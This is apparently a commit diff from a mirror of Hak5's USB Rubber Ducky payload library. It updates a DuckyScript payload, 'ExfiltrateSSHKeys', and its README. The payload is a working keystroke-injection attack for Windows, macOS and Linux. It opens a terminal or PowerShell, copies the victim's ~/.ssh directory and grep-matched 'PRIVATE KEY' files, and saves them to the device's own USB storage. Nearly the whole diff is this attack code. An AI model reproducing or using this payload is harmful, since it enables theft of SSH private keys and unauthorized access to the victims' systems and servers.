hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

making requested changes

pull/442/head
Thomas Gruebl 2024-05-18 10:16:58 +02:00
parent c1e4956391
commit f134a9bd65
2 changed files with 18 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
payloads/library/exfiltration/ExfiltrateSSHKeys/README.md
View File

@ -15,6 +15,10 @@ Requirements: DuckyScript 3.0, PayloadStudio v1.3.1
`DEFINE #PARENT_DIR Desktop`
- You must define your ducky drive label:
`DEFINE #DUCKY_DRIVE_LABEL DUCKY`
- You can switch between operating systems by changing the following bools:
`DEFINE #WINDOWS TRUE`
@ -23,4 +27,4 @@ Requirements: DuckyScript 3.0, PayloadStudio v1.3.1
`DEFINE #LINUX FALSE`
Alternatively, you may replace the conditional compilation flags with the OS_DETECTION EXTENSION.
Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE). DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.

22
payloads/library/exfiltration/ExfiltrateSSHKeys/payload.txt
View File

@ -39,11 +39,15 @@ ATTACKMODE HID STORAGE
$_JITTER_ENABLED = TRUE
REM Define OS - Alternatively replace this with the OS_DETECTION EXTENSION
REM Define OS - Only set ONE definition at the time to TRUE (e.g. DEFINE #WINDOWS TRUE).
REM DEFINE #WINDOWS TRUE, DEFINE #MACOS TRUE, and DEFINE #LINUX TRUE won't function.
DEFINE #WINDOWS TRUE
DEFINE #MACOS FALSE
DEFINE #LINUX FALSE
REM Define Rubber Ducky Drive Label
DEFINE #DUCKY_DRIVE_LABEL DUCKY
REM Using "Desktop" as a sample directory
DEFINE #PARENT_DIR Desktop
@ -62,20 +66,20 @@ IF_DEFINED_TRUE #MACOS
REM Create exfiltration directory + add some extra delay to give the rubber ducky time to mount storage
DELAY 2000
STRING mkdir /Volumes/DUCKY/ssh_exfiltration
STRING mkdir /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER
DELAY 100
REM Method 1: Copy ~/.ssh dir
STRING cp .ssh/* /Volumes/DUCKY/ssh_exfiltration
STRING cp .ssh/* /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 50
ENTER
DELAY 1000
REM Method 2: Recursively search a parent directory for an ssh key pattern
STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/DUCKY/ssh_exfiltration; done;
STRING matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /Volumes/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;
DELAY 50
ENTER
@ -100,7 +104,7 @@ IF_DEFINED_TRUE #WINDOWS
REM Method 1: Copy ~/.ssh dir
GUI r
DELAY 500
STRING powershell "$vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING mkdir $vol':\'ssh_exfiltration\;
STRING cp -r $env:USERPROFILE\.ssh\* $vol':\'ssh_exfiltration\; Start-Sleep -Seconds 0.5"
DELAY 100
@ -110,7 +114,7 @@ IF_DEFINED_TRUE #WINDOWS
REM Method 2: Recursively search a parent directory for an ssh key pattern
GUI r
DELAY 100
STRING powershell "$vol=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;
STRING powershell "$vol=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
STRING $matches=(findstr /MSPI 'PRIVATE KEY' $env:USERPROFILE\#PARENT_DIR\*);
STRING $split_matches=$matches -split '`n';
STRING foreach ($line in $split_matches) { cp $line $vol':\'ssh_exfiltration\ }"
@ -135,16 +139,16 @@ IF_DEFINED_TRUE #LINUX
STRINGLN USER_NAME=$(whoami)
DELAY 500
STRINGLN mkdir /media/$USER_NAME/DUCKY/ssh_exfiltration
STRINGLN mkdir /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 100
REM Method 1: Copy ~/.ssh dir
STRINGLN cp .ssh/* /media/$USER_NAME/DUCKY/ssh_exfiltration
STRINGLN cp .ssh/* /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration
DELAY 1000
REM Method 2: Recursively search a parent directory for an ssh key pattern
STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/DUCKY/ssh_exfiltration; done;
STRINGLN matches=$(grep -rl "PRIVATE KEY" #PARENT_DIR) && for file in ${(f)matches}; do cp "$file" /media/$USER_NAME/#DUCKY_DRIVE_LABEL/ssh_exfiltration; done;
DELAY 3000